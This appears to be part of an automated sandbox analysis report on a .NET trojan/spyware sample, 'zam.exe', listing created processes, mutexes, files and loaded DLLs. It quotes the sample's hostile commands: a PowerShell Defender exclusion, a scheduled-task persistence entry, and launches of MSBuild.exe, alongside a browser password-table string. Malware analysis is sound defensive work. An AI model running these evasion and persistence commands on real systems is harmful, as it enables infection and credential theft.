Source: 0.2.zam.exe.6eb0000.7.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: _0020.AddAccessRule
Source: 0.2.zam.exe.4051320.3.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: _0020.SetAccessControl
Source: 0.2.zam.exe.4051320.3.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam.exe.4051320.3.raw.unpack, YTeue59Oa2xSvXIC3I.cs	Security API names: _0020.AddAccessRule
Source: 0.2.zam.exe.4051320.3.raw.unpack, qDqhN6HIZiYINXNeEI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam.exe.6eb0000.7.raw.unpack, qDqhN6HIZiYINXNeEI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: zam.exe, 00000000.00000002.1310701258.000000000265D000.00000004.00000800.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1351377685.0000000003327000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: .VbP@\

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@4/3

Source: C:\Users\user\Desktop\zam.exe

File created: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Mutant created: \Sessions\1\BaseNamedObjects\BRCcQHURQK
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03

Source: C:\Users\user\Desktop\zam.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp

Jump to behavior

Source: zam.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zam.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\zam.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zam.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3725779188.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002CCD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3725600731.00000000041F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000033EF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: zam.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\zam.exe

File read: C:\Users\user\Desktop\zam.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zam.exe "C:\Users\user\Desktop\zam.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\zam.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Section loaded: wintypes.dll	Jump to behavior
